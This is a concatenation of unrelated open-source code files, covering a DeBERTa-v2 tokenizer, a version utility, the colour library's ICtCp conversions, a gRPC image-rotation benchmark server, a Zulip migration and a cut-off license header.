"microsoft/deberta-v2-xlarge": 512,
"microsoft/deberta-v2-xxlarge": 512,
"microsoft/deberta-v2-xlarge-mnli": 512,
"microsoft/deberta-v2-xxlarge-mnli": 512,
}
PRETRAINED_INIT_CONFIGURATION = {
"microsoft/deberta-v2-xlarge": {"do_lower_case": False},
"microsoft/deberta-v2-xxlarge": {"do_lower_case": False},
"microsoft/deberta-v2-xlarge-mnli": {"do_lower_case": False},
"microsoft/deberta-v2-xxlarge-mnli": {"do_lower_case": False},
}
class DebertaV2TokenizerFast(PreTrainedTokenizerFast):
r"""
Constructs a DeBERTa-v2 fast tokenizer. Based on [SentencePiece](https://github.com/google/sentencepiece).
Args:
vocab_file (`str`):
[SentencePiece](https://github.com/google/sentencepiece) file (generally has a *.spm* extension) that
contains the vocabulary necessary to instantiate a tokenizer.
do_lower_case (`bool`, *optional*, defaults to `False`):
Whether or not to lowercase the input when tokenizing.
bos_token (`string`, *optional*, defaults to `"[CLS]"`):
The beginning of sequence token that was used during pre-training. Can be used a sequence classifier token.
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
eos_token (`string`, *optional*, defaults to `"[SEP]"`):
The end of sequence token. When building a sequence using special tokens, this is not the token that is
used for the end of sequence. The token used is the `sep_token`.
unk_token (`str`, *optional*, defaults to `"[UNK]"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
sep_token (`str`, *optional*, defaults to `"[SEP]"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (`str`, *optional*, defaults to `"[PAD]"`):
The token used for padding, for example when batching sequences of different lengths.
cls_token (`str`, *optional*, defaults to `"[CLS]"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
mask_token (`str`, *optional*, defaults to `"[MASK]"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
sp_model_kwargs (`dict`, *optional*):
Will be passed to the `SentencePieceProcessor.__init__()` method. The [Python wrapper for
SentencePiece](https://github.com/google/sentencepiece/tree/master/python) can be used, among other things,
to set:
- `enable_sampling`: Enable subword regularization.
- `nbest_size`: Sampling parameters for unigram. Invalid for BPE-Dropout.
- `nbest_size = {0,1}`: No sampling is performed.
- `nbest_size > 1`: samples from the nbest_size results.
- `nbest_size < 0`: assuming that nbest_size is infinite and samples from the all hypothesis (lattice)
using forward-filtering-and-backward-sampling algorithm.
- `alpha`: Smoothing parameter for unigram sampling, and dropout probability of merge operations for
BPE-dropout.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
slow_tokenizer_class = DebertaV2Tokenizer
def __init__(
self,
vocab_file=None,
tokenizer_file=None,
do_lower_case=False,
split_by_punct=False,
bos_token="[CLS]",
eos_token="[SEP]",
unk_token="[UNK]",
sep_token="[SEP]",
pad_token="[PAD]",
cls_token="[CLS]",
mask_token="[MASK]",
**kwargs
) -> None:
super().__init__(
vocab_file,
tokenizer_file=tokenizer_file,
do_lower_case=do_lower_case,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
pad_token=pad_token,
cls_token=cls_token,
mask_token=mask_token,
split_by_punct=split_by_punct,
**kwargs,
)
self.do_lower_case = do_lower_case
self.split_by_punct = split_by_punct
self.vocab_file = vocab_file
self.can_save_slow_tokenizer = False if not self.vocab_file else True
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A DeBERTa sequence has the following format:
- single sequence: [CLS] X [SEP]
- pair of sequences: [CLS] A [SEP] B [SEP]
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + token_ids_1 + sep
def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False):
"""
Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` or `encode_plus` methods.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is not None:
return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1]
def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None):
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. A DeBERTa
sequence pair mask has the following format:
```
0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1
| first sequence | second sequence |
```
If `token_ids_1` is `None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [token type IDs](../glossary#token-type-ids) according to the given sequence(s).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not self.can_save_slow_tokenizer:
raise ValueError(
"Your fast tokenizer does not have the necessary information to save the vocabulary for a slow "
"tokenizer."
)
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
out_vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file):
copyfile(self.vocab_file, out_vocab_file)
return (out_vocab_file,)
|
runway/utils/_version.py
|
onicagroup/runway
| 134 |
64712
|
"""Version utilities."""
from __future__ import annotations
import packaging.version
class Version(packaging.version.Version):
"""Customize packagining.version.Version."""
def __init__(self, version: str) -> None:
"""Instantiate class.
Args:
version: Version string. (e.g. 1.0.0, v1.0.0)
"""
self._original_text = version
super().__init__(version)
def __repr__(self) -> str:
"""Return repr."""
# this usage of super is required to reproduce the intended result in
# any subclasses of this class
# pylint: disable=super-with-arguments
return f"<Version('{super(Version, self).__str__()}')>"
def __str__(self) -> str:
"""Return the original version string."""
return self._original_text
|
colour/models/rgb/ictcp.py
|
colour-science/colour
| 1,380 |
64723
|
# -*- coding: utf-8 -*-
"""
:math:`IC_TC_P` Colour Encoding
===============================
Defines the :math:`IC_TC_P` colour encoding related transformations:
- :func:`colour.RGB_to_ICtCp`
- :func:`colour.ICtCp_to_RGB`
- :func:`colour.XYZ_to_ICtCp`
- :func:`colour.ICtCp_to_XYZ`
References
----------
- :cite:`Dolby2016a` : Dolby. (2016). WHAT IS ICtCp? - INTRODUCTION.
https://www.dolby.com/us/en/technologies/dolby-vision/ICtCp-white-paper.pdf
- :cite:`InternationalTelecommunicationUnion2018` : International
Telecommunication Union. (2018). Recommendation ITU-R BT.2100-2 - Image
parameter values for high dynamic range television for use in production
and international programme exchange.
https://www.itu.int/dms_pubrec/itu-r/rec/bt/\
R-REC-BT.2100-2-201807-I!!PDF-E.pdf
- :cite:`Lu2016c` : <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., Pytlarz,
J., <NAME>., <NAME>., & <NAME>. (2016). ITP Colour Space and Its
Compression Performance for High Dynamic Range and Wide Colour Gamut Video
Distribution. ZTE Communications, 14(1), 32-38.
"""
import numpy as np
from colour.algebra import vector_dot
from colour.colorimetry import CCS_ILLUMINANTS
from colour.models.rgb import RGB_COLOURSPACES, RGB_to_XYZ, XYZ_to_RGB
from colour.models.rgb.transfer_functions import (
eotf_ST2084, eotf_inverse_ST2084, oetf_HLG_BT2100, oetf_inverse_HLG_BT2100)
from colour.utilities import (domain_range_scale, from_range_1, to_domain_1,
validate_method)
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = [
'MATRIX_ICTCP_RGB_TO_LMS', 'MATRIX_ICTCP_LMS_TO_RGB',
'MATRIX_ICTCP_LMS_P_TO_ICTCP', 'MATRIX_ICTCP_ICTCP_TO_LMS_P',
'MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2',
'MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2', 'RGB_to_ICtCp', 'ICtCp_to_RGB',
'XYZ_to_ICtCp', 'ICtCp_to_XYZ'
]
MATRIX_ICTCP_RGB_TO_LMS = np.array([
[1688, 2146, 262],
[683, 2951, 462],
[99, 309, 3688],
]) / 4096
"""
*ITU-R BT.2020* colourspace to normalised cone responses matrix.
MATRIX_ICTCP_RGB_TO_LMS : array_like, (3, 3)
"""
MATRIX_ICTCP_LMS_TO_RGB = np.linalg.inv(MATRIX_ICTCP_RGB_TO_LMS)
"""
:math:`IC_TC_P` colourspace normalised cone responses to *ITU-R BT.2020*
colourspace matrix.
MATRIX_ICTCP_LMS_TO_RGB : array_like, (3, 3)
"""
MATRIX_ICTCP_LMS_P_TO_ICTCP = np.array([
[2048, 2048, 0],
[6610, -13613, 7003],
[17933, -17390, -543],
]) / 4096
"""
:math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses to
:math:`IC_TC_P` colour encoding matrix.
MATRIX_ICTCP_LMS_P_TO_ICTCP : array_like, (3, 3)
"""
MATRIX_ICTCP_ICTCP_TO_LMS_P = np.linalg.inv(MATRIX_ICTCP_LMS_P_TO_ICTCP)
"""
:math:`IC_TC_P` colour encoding to :math:`LMS_p` *SMPTE ST 2084:2014* encoded
normalised cone responses matrix.
MATRIX_ICTCP_ICTCP_TO_LMS_P : array_like, (3, 3)
"""
MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2 = np.array([
[2048, 2048, 0],
[3625, -7465, 3840],
[9500, -9212, -288],
]) / 4096
"""
:math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses to
:math:`IC_TC_P` colour encoding matrix as given in *ITU-R BT.2100-2*.
MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2 : array_like, (3, 3)
"""
MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2 = np.linalg.inv(
MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2)
"""
:math:`IC_TC_P` colour encoding to :math:`LMS_p` *SMPTE ST 2084:2014* encoded
normalised cone responses matrix as given in *ITU-R BT.2100-2*.
MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2 : array_like, (3, 3)
"""
def RGB_to_ICtCp(RGB, method='Dolby 2016', L_p=10000):
"""
Converts from *ITU-R BT.2020* colourspace to :math:`IC_TC_P` colour
encoding.
Parameters
----------
RGB : array_like
*ITU-R BT.2020* colourspace array.
method : unicode, optional
**{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
Computation method. *Recommendation ITU-R BT.2100* defines multiple
variants of the :math:`IC_TC_P` colour encoding:
- *ITU-R BT.2100-1*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix
from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method.
- *ITU-R BT.2100-2*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and a custom :math:`IC_TC_P`
matrix from :cite:`InternationalTelecommunicationUnion2018`:
*ITU-R BT.2100-2 HLG* method.
L_p : numeric, optional
Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
non-linear encoding. This parameter should stay at its default
:math:`10000 cd/m^2` value for practical applications. It is exposed so
that the definition can be used as a fitting function.
Returns
-------
ndarray
:math:`IC_TC_P` colour encoding array.
Warnings
--------
The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function.
Notes
-----
- The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases
for the *Dolby 2016* method.
- The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function, thus the domain and range values for the *Reference*
and *1* scales are only indicative that the data is not affected by
scale transformations. The effective domain of *SMPTE ST 2084:2014*
inverse electro-optical transfer function (EOTF / EOCF) is
[0.0001, 10000].
+------------+-----------------------+------------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``RGB`` | ``UN`` | ``UN`` |
+------------+-----------------------+------------------+
+------------+-----------------------+------------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] |
| | | |
| | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] |
| | | |
| | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] |
+------------+-----------------------+------------------+
References
----------
:cite:`Dolby2016a`, :cite:`Lu2016c`
Examples
--------
>>> RGB = np.array([0.45620519, 0.03081071, 0.04091952])
>>> RGB_to_ICtCp(RGB) # doctest: +ELLIPSIS
array([ 0.0735136..., 0.0047525..., 0.0935159...])
>>> RGB_to_ICtCp(RGB, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS
array([ 0.6256789..., -0.0198449..., 0.3591125...])
"""
RGB = to_domain_1(RGB)
method = validate_method(method, [
'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'
])
is_hlg_method = 'hlg' in method
is_BT2100_2_method = '2100-2' in method
LMS = vector_dot(MATRIX_ICTCP_RGB_TO_LMS, RGB)
with domain_range_scale('ignore'):
LMS_p = (oetf_HLG_BT2100(LMS)
if is_hlg_method else eotf_inverse_ST2084(LMS, L_p))
ICtCp = (vector_dot(MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2, LMS_p)
if (is_hlg_method and is_BT2100_2_method) else vector_dot(
MATRIX_ICTCP_LMS_P_TO_ICTCP, LMS_p))
return from_range_1(ICtCp)
def ICtCp_to_RGB(ICtCp, method='Dolby 2016', L_p=10000):
"""
Converts from :math:`IC_TC_P` colour encoding to *ITU-R BT.2020*
colourspace.
Parameters
----------
ICtCp : array_like
:math:`IC_TC_P` colour encoding array.
method : unicode, optional
**{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
Computation method. *Recommendation ITU-R BT.2100* defines multiple
variants of the :math:`IC_TC_P` colour encoding:
- *ITU-R BT.2100-1*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix
from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method.
- *ITU-R BT.2100-2*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and a custom :math:`IC_TC_P`
matrix from :cite:`InternationalTelecommunicationUnion2018`:
*ITU-R BT.2100-2 HLG* method.
L_p : numeric, optional
Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
non-linear encoding. This parameter should stay at its default
:math:`10000 cd/m^2` value for practical applications. It is exposed so
that the definition can be used as a fitting function.
Returns
-------
ndarray
*ITU-R BT.2020* colourspace array.
Warnings
--------
The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function.
Notes
-----
- The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases
for the *Dolby 2016* method.
- The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function, thus the domain and range values for the *Reference*
and *1* scales are only indicative that the data is not affected by
scale transformations.
+------------+-----------------------+------------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] |
| | | |
| | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] |
| | | |
| | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] |
+------------+-----------------------+------------------+
+------------+-----------------------+------------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``RGB`` | ``UN`` | ``UN`` |
+------------+-----------------------+------------------+
References
----------
:cite:`Dolby2016a`, :cite:`Lu2016c`
Examples
--------
>>> ICtCp = np.array([0.07351364, 0.00475253, 0.09351596])
>>> ICtCp_to_RGB(ICtCp) # doctest: +ELLIPSIS
array([ 0.4562052..., 0.0308107..., 0.0409195...])
>>> ICtCp = np.array([0.62567899, -0.01984490, 0.35911259])
>>> ICtCp_to_RGB(ICtCp, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS
array([ 0.4562052..., 0.0308107..., 0.0409195...])
"""
ICtCp = to_domain_1(ICtCp)
method = validate_method(method, [
'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'
])
is_hlg_method = 'hlg' in method
is_BT2100_2_method = '2100-2' in method
LMS_p = (vector_dot(MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2, ICtCp)
if (is_hlg_method and is_BT2100_2_method) else vector_dot(
MATRIX_ICTCP_ICTCP_TO_LMS_P, ICtCp))
with domain_range_scale('ignore'):
LMS = (oetf_inverse_HLG_BT2100(LMS_p)
if is_hlg_method else eotf_ST2084(LMS_p, L_p))
RGB = vector_dot(MATRIX_ICTCP_LMS_TO_RGB, LMS)
return from_range_1(RGB)
def XYZ_to_ICtCp(XYZ,
illuminant=CCS_ILLUMINANTS[
'CIE 1931 2 Degree Standard Observer']['D65'],
chromatic_adaptation_transform='CAT02',
method='Dolby 2016',
L_p=10000):
"""
Converts from *CIE XYZ* tristimulus values to :math:`IC_TC_P` colour
encoding.
Parameters
----------
XYZ : array_like
*CIE XYZ* tristimulus values.
illuminant : array_like, optional
Source illuminant chromaticity coordinates.
chromatic_adaptation_transform : unicode, optional
**{'CAT02', 'XYZ Scaling', '<NAME>', 'Bradford', 'Sharp',
'Fairchild', 'CMCCAT97', 'CMCCAT2000', 'CAT02 Brill 2008', 'CAT16',
'Bianco 2010', 'Bianco PC 2010'}**,
*Chromatic adaptation* transform.
method : unicode, optional
**{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
Computation method. *Recommendation ITU-R BT.2100* defines multiple
variants of the :math:`IC_TC_P` colour encoding:
- *ITU-R BT.2100-1*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix
from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method.
- *ITU-R BT.2100-2*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and a custom :math:`IC_TC_P`
matrix from :cite:`InternationalTelecommunicationUnion2018`:
*ITU-R BT.2100-2 HLG* method.
L_p : numeric, optional
Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
non-linear encoding. This parameter should stay at its default
:math:`10000 cd/m^2` value for practical applications. It is exposed so
that the definition can be used as a fitting function.
Returns
-------
ndarray
:math:`IC_TC_P` colour encoding array.
Warnings
--------
The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function.
Notes
-----
- The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function, thus the domain and range values for the *Reference*
- The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases
for the *Dolby 2016* method.
and *1* scales are only indicative that the data is not affected by
scale transformations. The effective domain of *SMPTE ST 2084:2014*
inverse electro-optical transfer function (EOTF / EOCF) is
[0.0001, 10000].
+------------+-----------------------+------------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``XYZ`` | ``UN`` | ``UN`` |
+------------+-----------------------+------------------+
+------------+-----------------------+------------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] |
| | | |
| | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] |
| | | |
| | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] |
+------------+-----------------------+------------------+
References
----------
:cite:`Dolby2016a`, :cite:`Lu2016c`
Examples
--------
>>> XYZ = np.array([0.20654008, 0.12197225, 0.05136952])
>>> XYZ_to_ICtCp(XYZ) # doctest: +ELLIPSIS
array([ 0.0685809..., -0.0028384..., 0.0602098...])
>>> XYZ_to_ICtCp(XYZ, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS
array([ 0.5924279..., -0.0374073..., 0.2512267...])
"""
BT2020 = RGB_COLOURSPACES['ITU-R BT.2020']
RGB = XYZ_to_RGB(
XYZ,
illuminant,
BT2020.whitepoint,
BT2020.matrix_XYZ_to_RGB,
chromatic_adaptation_transform,
)
return RGB_to_ICtCp(RGB, method, L_p)
def ICtCp_to_XYZ(ICtCp,
illuminant=CCS_ILLUMINANTS[
'CIE 1931 2 Degree Standard Observer']['D65'],
chromatic_adaptation_transform='CAT02',
method='Dolby 2016',
L_p=10000):
"""
Converts from :math:`IC_TC_P` colour encoding to *CIE XYZ* tristimulus
values.
Parameters
----------
ICtCp : array_like
:math:`IC_TC_P` colour encoding array.
illuminant : array_like, optional
Source illuminant chromaticity coordinates.
chromatic_adaptation_transform : unicode, optional
**{'CAT02', 'XYZ Scaling', '<NAME>', 'Bradford', 'Sharp',
'Fairchild', 'CMCCAT97', 'CMCCAT2000', 'CAT02 Brill 2008', 'CAT16',
'Bianco 2010', 'Bianco PC 2010'}**,
*Chromatic adaptation* transform.
method : unicode, optional
**{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
Computation method. *Recommendation ITU-R BT.2100* defines multiple
variants of the :math:`IC_TC_P` colour encoding:
- *ITU-R BT.2100-1*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix
from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method.
- *ITU-R BT.2100-2*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and a custom :math:`IC_TC_P`
matrix from :cite:`InternationalTelecommunicationUnion2018`:
*ITU-R BT.2100-2 HLG* method.
L_p : numeric, optional
Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
non-linear encoding. This parameter should stay at its default
:math:`10000 cd/m^2` value for practical applications. It is exposed so
that the definition can be used as a fitting function.
Returns
-------
ndarray
*CIE XYZ* tristimulus values.
Warnings
--------
The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function.
Notes
-----
- The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases
for the *Dolby 2016* method.
- The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function, thus the domain and range values for the *Reference*
and *1* scales are only indicative that the data is not affected by
scale transformations.
+------------+-----------------------+------------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] |
| | | |
| | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] |
| | | |
| | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] |
+------------+-----------------------+------------------+
+------------+-----------------------+------------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``XYZ`` | ``UN`` | ``UN`` |
+------------+-----------------------+------------------+
References
----------
:cite:`Dolby2016a`, :cite:`Lu2016c`
Examples
--------
>>> ICtCp = np.array([0.06858097, -0.00283842, 0.06020983])
>>> ICtCp_to_XYZ(ICtCp) # doctest: +ELLIPSIS
array([ 0.2065400..., 0.1219722..., 0.0513695...])
>>> ICtCp = np.array([0.59242792, -0.03740730, 0.25122675])
>>> ICtCp_to_XYZ(ICtCp, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS
array([ 0.2065400..., 0.1219722..., 0.0513695...])
"""
RGB = ICtCp_to_RGB(ICtCp, method, L_p)
BT2020 = RGB_COLOURSPACES['ITU-R BT.2020']
XYZ = RGB_to_XYZ(
RGB,
BT2020.whitepoint,
illuminant,
BT2020.matrix_RGB_to_XYZ,
chromatic_adaptation_transform,
)
return XYZ
|
function-images/image_rotate_s3/server.py
|
tom-kuchler/vhive
| 138 |
64750
|
from concurrent import futures
import logging
import os
import grpc
from PIL import Image, ImageOps
import helloworld_pb2
import helloworld_pb2_grpc
from minio import Minio
minioEnvKey = "MINIO_ADDRESS"
image_name = 'img2.jpeg'
image2_name = 'img3.jpeg'
image_path = '/pulled_' + image_name
image_path2 = '/pulled_' +image2_name
responses = ["record_response", "replay_response"]
minioAddress = os.getenv(minioEnvKey)
class Greeter(helloworld_pb2_grpc.GreeterServicer):
def SayHello(self, request, context):
if minioAddress == None:
return None
minioClient = Minio(minioAddress,
access_key='minioadmin',
secret_key='minioadmin',
secure=False)
if request.name == "record":
msg = 'Hello, %s!' % responses[0]
minioClient.fget_object('mybucket', image_name, image_path)
image = Image.open(image_path)
img = image.transpose(Image.ROTATE_90)
elif request.name == "replay":
msg = 'Hello, %s!' % responses[1]
minioClient.fget_object('mybucket', image2_name, image_path2)
image2 = Image.open(image_path2)
img = image2.transpose(Image.ROTATE_90)
else:
msg = 'Hello, %s!' % request.name
minioClient.fget_object('mybucket', image_name, image_path)
image = Image.open(image_path)
img = image.transpose(Image.ROTATE_90)
return helloworld_pb2.HelloReply(message=msg)
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))
helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)
server.add_insecure_port('[::]:50051')
server.start()
server.wait_for_termination()
if __name__ == '__main__':
logging.basicConfig()
serve()
|
zerver/migrations/0230_rename_to_enable_stream_audible_notifications.py
|
TylerPham2000/zulip
| 17,004 |
64768
|
# Generated by Django 1.11.20 on 2019-06-12 06:41
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("zerver", "0229_stream_message_retention_days"),
]
operations = [
migrations.RenameField(
model_name="userprofile",
old_name="enable_stream_sounds",
new_name="enable_stream_audible_notifications",
),
]
|
gs/monitor2/apps/dashboard/views.py
|
leozz37/makani
| 1,178 |
64789
|
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
